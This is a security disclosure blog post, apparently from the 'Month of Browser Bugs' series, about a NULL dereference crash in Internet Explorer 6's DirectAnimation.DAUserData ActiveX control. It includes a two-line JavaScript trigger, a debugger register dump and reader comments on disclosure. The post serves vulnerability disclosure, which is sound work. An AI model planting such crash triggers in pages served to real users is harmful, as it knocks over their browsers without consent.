MoBB #9: DirectAnimation.DAUserData Data
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. The "Data" property of the DAUserData object is designed to be accessed only after it has been initialized. We can trigger a NULL dereference by asking for it without calling the Init() method first.
var a = new ActiveXObject('DirectAnimation.DAUserData');
a.Data = 'Hello';
Demonstration
eax=00000000 ebx=5a327320 ecx=00000000
edx=0003b7c8 esi=00000000 edi=0003f1cc
eip=5a3415b6 esp=0013b1a4 ebp=0013b1b4
danim!CRUserDataImpl::GetData+0x5:
5a3415b6 837e0800 cmp dword ptr [esi+0x8],0x0 ds:0023:00000008=????????
This bug was reported to Microsoft in March of 2006.
This bug will be added to the OSVDB:
Microsoft IE DirectAnimation.DAUserData Data Property NULL Dereference
posted by hdm @ 11:00 PM
3 comments
links to this post
3 Comments:
When will browser bugs be regulated to the likes of SQL injection and XSS attacks?
I mean isn't this just as bad as picking on Joe Bob's php application for it's file include problem, or kicking a small dog?
Are you going to do a month of excel vulns, or word doc vulns, or ppt vulns? I'd like to see those things die away also.
I think the small dog would agree that this is better.
The MoBB project should help in killing off the really obvious bugs and hopefully the fuzzing tools will be used by the vendors to ensure that they stay dead.
The buggy ActiveX control is not present on my XPSP2 system, thus no IE6 crashing.
IE7 doesn't crash either.
Post a Comment
Links to this post:
Create a Link
<< Home